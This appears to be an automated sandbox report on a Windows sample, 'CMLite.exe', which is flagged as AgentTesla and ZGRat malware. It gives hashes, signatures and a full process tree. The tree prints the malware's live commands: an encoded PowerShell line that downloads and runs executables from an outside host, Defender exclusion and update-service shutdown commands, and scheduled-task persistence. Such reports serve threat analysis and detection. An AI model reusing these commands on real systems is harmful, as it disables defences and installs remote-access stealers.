Overview

overview

10

Static

static

1

CMLite.exe

windows7-x64

10

CMLite.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    151s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-05-2024 20:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    CMLite.exe

  • Size

    2.3MB

  • MD5

    616a65eb66de1b0218401d55bc36e8b8

  • SHA1

    3c61c3844590cdffe11218fb8f5bb13a5555d52e

  • SHA256

    35bbb997958723a543c906b2c014da4e73d28b935260a58a46c5c09d2920bb89

  • SHA512

    c77ace0d3a8a9dfb5d18e5099b2afef1ad5bc0add6a947fcf1efc8c32be2f8ccab7405bccc8f7514b4f2a884a4c01969e097bf87e724b60effca333628e03004

  • SSDEEP

    49152:C3Iq8lWFDP5E73BgWmU2p77Qqs10y3SryMqf:CMeDPYCWmn5QfbSryMqf

Score
10/10
agentteslazgratevasionexecutionkeyloggerpersistenceratspywarestealertrojan

Malware Config

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Detect ZGRat V1 3 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • AgentTesla payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Creates new service(s) 2 TTPs
    persistenceexecution
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 5 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 26 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 52 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\CMLite.exe
    "C:\Users\Admin\AppData\Local\Temp\CMLite.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:864
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAcwBrACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABpAGcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBtAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABzAHcAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBDAE0ATABpAHQAZQBJAG4AcwB0AGEAbABsAGUAcgAuAGUAeABlACcALAAgADwAIwBhAHoAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGEAdgBqACMAPgAgAC0AUABhAHQAaAAgACgAJABwAHcAZAApAC4AcABhAHQAaAAgADwAIwB6AHAAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDAE0ATABpAHQAZQBJAG4AcwB0AGEAbABsAGUAcgAuAGUAeABlACcAKQApADwAIwBxAGgAbgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AcgBlAG0AbwB0AGUALwBjAG0ASAB5AHAAZQByAHMAdQByAHIAbwBnAGEAdABlAHMAYQB2AGUAcwBEAGgAYwBwAC4AZQB4AGUAJwAsACAAPAAjAGYAbQBoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAawBtAGQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYgBzAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBtAEgAeQBwAGUAcgBzAHUAcgByAG8AZwBhAHQAZQBzAGEAdgBlAHMARABoAGMAcAAuAGUAeABlACcAKQApADwAIwB5AHgAZwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AbQAvAGMAbwBuAGgAbwBzAHQAZwBtAC4AZQB4AGUAJwAsACAAPAAjAGMAcgBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeABzAGgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdAB4AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABnAG0ALgBlAHgAZQAnACkAKQA8ACMAeQBqAHAAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQBpAHYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACgAJABwAHcAZAApAC4AcABhAHQAaAAgADwAIwB6AG0AYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDAE0ATABpAHQAZQBJAG4AcwB0AGEAbABsAGUAcgAuAGUAeABlACcAKQA8ACMAeQBpAGoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcQBiAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGwAeQBwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbQBIAHkAcABlAHIAcwB1AHIAcgBvAGcAYQB0AGUAcwBhAHYAZQBzAEQAaABjAHAALgBlAHgAZQAnACkAPAAjAGcAbQBiACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAG0AdQBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBhAHEAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBjAG8AbgBoAG8AcwB0AGcAbQAuAGUAeABlACcAKQA8ACMAZwB5AHcAIwA+AA=="
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4412
      • C:\Users\Admin\AppData\Local\Temp\CMLiteInstaller.exe
        "C:\Users\Admin\AppData\Local\Temp\CMLiteInstaller.exe"
        3⤵
        • Executes dropped EXE
        • Enumerates system info in registry
        PID:4372
      • C:\Users\Admin\AppData\Roaming\cmHypersurrogatesavesDhcp.exe
        "C:\Users\Admin\AppData\Roaming\cmHypersurrogatesavesDhcp.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:3808
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\BridgeChainserverwinDriver\lWPzR1COw6cbe1Bc3dVzDZxdAD6Pz4jxoWgNKIOPHWBjqt3tHIP3Cr.vbe"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1500
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\BridgeChainserverwinDriver\SQvq6Fq.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3320
            • C:\BridgeChainserverwinDriver\cmHypersurrogatesavesDhcp.exe
              "C:\BridgeChainserverwinDriver/cmHypersurrogatesavesDhcp.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Drops file in Windows directory
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2528
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\dwm.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:1288
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Internet Explorer\en-US\explorer.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:932
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\spoolsv.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:4884
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\cmd.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:2304
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Containers\serviced\powershell.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:1716
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TvzsxxT1Hv.bat"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:1028
                • C:\Windows\system32\chcp.com
                  chcp 65001
                  8⤵
                    PID:5020
                  • C:\Windows\system32\PING.EXE
                    ping -n 10 localhost
                    8⤵
                    • Runs ping.exe
                    PID:852
                  • C:\Windows\TAPI\dwm.exe
                    "C:\Windows\TAPI\dwm.exe"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:572
        • C:\Users\Admin\AppData\Roaming\conhostgm.exe
          "C:\Users\Admin\AppData\Roaming\conhostgm.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4884
          • C:\Users\Admin\AppData\Roaming\.conhostgm.exe
            "C:\Users\Admin\AppData\Roaming\.conhostgm.exe"
            4⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            PID:1752
            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:3896
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3856
              • C:\Windows\system32\wusa.exe
                wusa /uninstall /kb:890830 /quiet /norestart
                6⤵
                  PID:1248
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop UsoSvc
                5⤵
                • Launches sc.exe
                PID:1880
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop WaaSMedicSvc
                5⤵
                • Launches sc.exe
                PID:4496
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop wuauserv
                5⤵
                • Launches sc.exe
                PID:3272
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop bits
                5⤵
                • Launches sc.exe
                PID:3444
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop dosvc
                5⤵
                • Launches sc.exe
                PID:4328
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                5⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4384
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                5⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4596
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                5⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2572
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                5⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1100
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe delete "driverupdate"
                5⤵
                • Launches sc.exe
                PID:2740
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
                5⤵
                • Launches sc.exe
                PID:3488
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop eventlog
                5⤵
                • Launches sc.exe
                PID:3332
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe start "driverupdate"
                5⤵
                • Launches sc.exe
                PID:2228
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3804 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:8
        1⤵
          PID:4460
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Windows\TAPI\dwm.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:5068
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\TAPI\dwm.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4480
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Windows\TAPI\dwm.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:1968
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Internet Explorer\en-US\explorer.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:2316
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\en-US\explorer.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:2108
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Internet Explorer\en-US\explorer.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:5004
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\odt\spoolsv.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:3640
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\odt\spoolsv.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4644
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\odt\spoolsv.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4596
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\odt\cmd.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:2160
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\odt\cmd.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4384
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\odt\cmd.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:436
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 11 /tr "'C:\Windows\Containers\serviced\powershell.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:1100
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Windows\Containers\serviced\powershell.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:400
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 9 /tr "'C:\Windows\Containers\serviced\powershell.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:3884
        • C:\ProgramData\VC_redist.x64.exe
          C:\ProgramData\VC_redist.x64.exe
          1⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:3948
          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious use of AdjustPrivilegeToken
            PID:3780
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1772
            • C:\Windows\system32\wusa.exe
              wusa /uninstall /kb:890830 /quiet /norestart
              3⤵
                PID:2852
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop UsoSvc
              2⤵
              • Launches sc.exe
              PID:4472
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop WaaSMedicSvc
              2⤵
              • Launches sc.exe
              PID:516
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop wuauserv
              2⤵
              • Launches sc.exe
              PID:392
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop bits
              2⤵
              • Launches sc.exe
              PID:3616
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop dosvc
              2⤵
              • Launches sc.exe
              PID:2036
            • C:\Windows\system32\powercfg.exe
              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              2⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:408
            • C:\Windows\system32\powercfg.exe
              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              2⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1112
            • C:\Windows\system32\powercfg.exe
              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              2⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2476
            • C:\Windows\system32\powercfg.exe
              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              2⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3912
            • C:\Windows\system32\conhost.exe
              C:\Windows\system32\conhost.exe
              2⤵
                PID:2404

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\BridgeChainserverwinDriver\SQvq6Fq.bat
              Filesize

              102B

              MD5

              96b489ae2503e2ab4e18a2b584fad475

              SHA1

              873daaaec0a6978a3f6e9a99bf66dfa388ea8321

              SHA256

              6c5ade02c3d706cf54d5d7e0ce525034179ac3f80866caf615e265737df6f1c1

              SHA512

              9ac4ba04e5bc86aced9fbab34b2564bbd59ff249598a4e4501105ee6a443b0467b2995fdeef49cffd84ca106b6256f21a26e243d4396f0a394c2110b7fe54d52

              Download Submit

            • C:\BridgeChainserverwinDriver\cmHypersurrogatesavesDhcp.exe
              Filesize

              2.0MB

              MD5

              2eea3122b5e1a714d45f7718ce3a25e3

              SHA1

              b6d45f1124bf85fd571e6ea9417104b51d539456

              SHA256

              bb8b517b159e137ba92f0ab246630ff36e20fe350056afa75be751fedd634b55

              SHA512

              13c6eedaf9a582d6c02ad478e24a5ae7d66c1195677e8d42541355807336dba09ce736e4539bfe04ce3b98e40aa52c54f457eda6a8b5fd547b784d7c6c89258e

              Download Submit

            • C:\BridgeChainserverwinDriver\lWPzR1COw6cbe1Bc3dVzDZxdAD6Pz4jxoWgNKIOPHWBjqt3tHIP3Cr.vbe
              Filesize

              211B

              MD5

              d4f337599faff375fa8c61471ad7048c

              SHA1

              7bc11cc1588e072698090393875dcf856b874ba1

              SHA256

              10d502ba0315c5fc07e317116ff1dda94b59fe8f6381d75a319a2c7e0891e07a

              SHA512

              6291806cc91e9162a878973b0b02186869fdbb6457fdbf15d6f7b2e538638b3026b66dc5443c8dde0e79d33483aea18e363e711e788c6dab911678bd19a40899

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
              Filesize

              2KB

              MD5

              d85ba6ff808d9e5444a4b369f5bc2730

              SHA1

              31aa9d96590fff6981b315e0b391b575e4c0804a

              SHA256

              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

              SHA512

              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              19KB

              MD5

              99f60b9d54ebc1b6cdffe75aad7e0ebf

              SHA1

              a36ceac997b46d1c8b8b9082575f982087fdbd74

              SHA256

              926a550d54673f25b5675f37fdee79f4523807f04c9668f115aa22e04e4deb45

              SHA512

              c802b02aa7da9d5becb7766f9872cd92c55733e111147344a9e8296bc64e7abc0a026df1d2c501102d11c64d970334a66253d35aa7120819e76227db4e4ff7be

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              948B

              MD5

              a7ce8cefc3f798abe5abd683d0ef26dd

              SHA1

              b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e

              SHA256

              5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a

              SHA512

              c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              948B

              MD5

              ca06eecda63175f9917e177b5448f677

              SHA1

              5d96fd4964d447a521f02b60cc9c7916617caf96

              SHA256

              aebb3d15ed39071026133c0826d8f8451bb454760f296e4970e765ece366599e

              SHA512

              e282d77aa0a4635ca9e2f0e8c98aa69efb335d9b18573c635365f41c9077300256be3f016a6614166ac9c60a7edda459cce787783c2fde9a0aa92b4d62e99dfb

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              948B

              MD5

              0665738bee6e1623848569cc27d1d1ed

              SHA1

              c6a3fbe356c249a0bc4717eece548f82749fa0d0

              SHA256

              d7de0852f3af7e57e7e517210ed631b4d712c6d903f9834918ca4ecb6b808d4b

              SHA512

              5a22e05bd3f13ff5ec2cfdfbca4a8023da01e8c1c5781229f653c513a9c6f22891666d012ea5cc0f14598e2df9e7a2c5c5458e0c6cf7266b6ee33080f2d083f9

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\CMLiteInstaller.exe
              Filesize

              977KB

              MD5

              02ea34533272f916fb52990a45917913

              SHA1

              bd68a7c84b7d7a65ab19419ddf6a2a2b44fda0a4

              SHA256

              6dd45a770648da5f5996ac7b28f604493b44f8b1ba7458cf60d3a1ab7cf18590

              SHA512

              352521214ed922b0e3331559d0c6b2af0fc55e4b4077dcf83dbeec08a8f59820c98bbbd795cdd8e2430c835ba7fbb6b19c34572762c7cf6359de05b99ef019a7

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\TvzsxxT1Hv.bat
              Filesize

              151B

              MD5

              4ecaee3ab65968d187ac5476b02f480b

              SHA1

              5c1911347771f67ca220efa53f447a6511cfc178

              SHA256

              b00ab38d98e9895b76f317eb9c7242ce5dec581f81c3c884e7124aad2c58caae

              SHA512

              c5d3ca98abc9a2ef8b7d8afdca17cb075ed467e6ba23cce4123b193dc144004178385213fbb30335540ce173eb75efc07495990d788f166088632e6ff37e198a

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bowhi3ub.uca.ps1
              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              Download Submit

            • C:\Users\Admin\AppData\Roaming\cmHypersurrogatesavesDhcp.exe
              Filesize

              2.3MB

              MD5

              322944acd00186c743f6ff097c0db0c6

              SHA1

              a330f89db2367088048022b74be3a2cb67853a61

              SHA256

              aed6159dc2a264fd2fb0c0d20d7816c26741e1fcd517b06ed4726a8ff1e32d5a

              SHA512

              bf1a98a40a94ea180c01dd90610ee434fd555592ca2e21078330493cd4f8b1f401ae3a5bdf1c0beb4d2181b135760a66ac2c73881d7611f57ef6ceba4fa3e7e3

              Download Submit

            • C:\Users\Admin\AppData\Roaming\conhostgm.exe
              Filesize

              2.9MB

              MD5

              316fa77cc45d0802155448d648b417b4

              SHA1

              c60be59c3df582030f3bbbf7c93e3f6110a38c82

              SHA256

              dd248b4df3e5b9eac86bbe9fc6f7ef17b0d75738b601267b214a825783d0a2a1

              SHA512

              4f1a4b71bc0d18dd6210c7b55736e2c43cf90f7ed700061a775ceecade3ef2b88c0e122769c5570e5bb2b8453deab6d5ff50ab73ff0fbb1cb9b3475be76c4da9

              Download Submit

            • memory/572-251-0x000000001D2A0000-0x000000001D36D000-memory.dmp

              Filesize

              820KB

              Download

            • memory/864-0-0x0000000000400000-0x0000000000DAC000-memory.dmp

              Filesize

              9.7MB

              Download

            • memory/864-3-0x000000007FA70000-0x000000007FE41000-memory.dmp

              Filesize

              3.8MB

              Download

            • memory/864-2-0x0000000000400000-0x0000000000DAC000-memory.dmp

              Filesize

              9.7MB

              Download

            • memory/864-1-0x000000007FA70000-0x000000007FE41000-memory.dmp

              Filesize

              3.8MB

              Download

            • memory/932-203-0x0000020F4DDE0000-0x0000020F4DF2E000-memory.dmp

              Filesize

              1.3MB

              Download

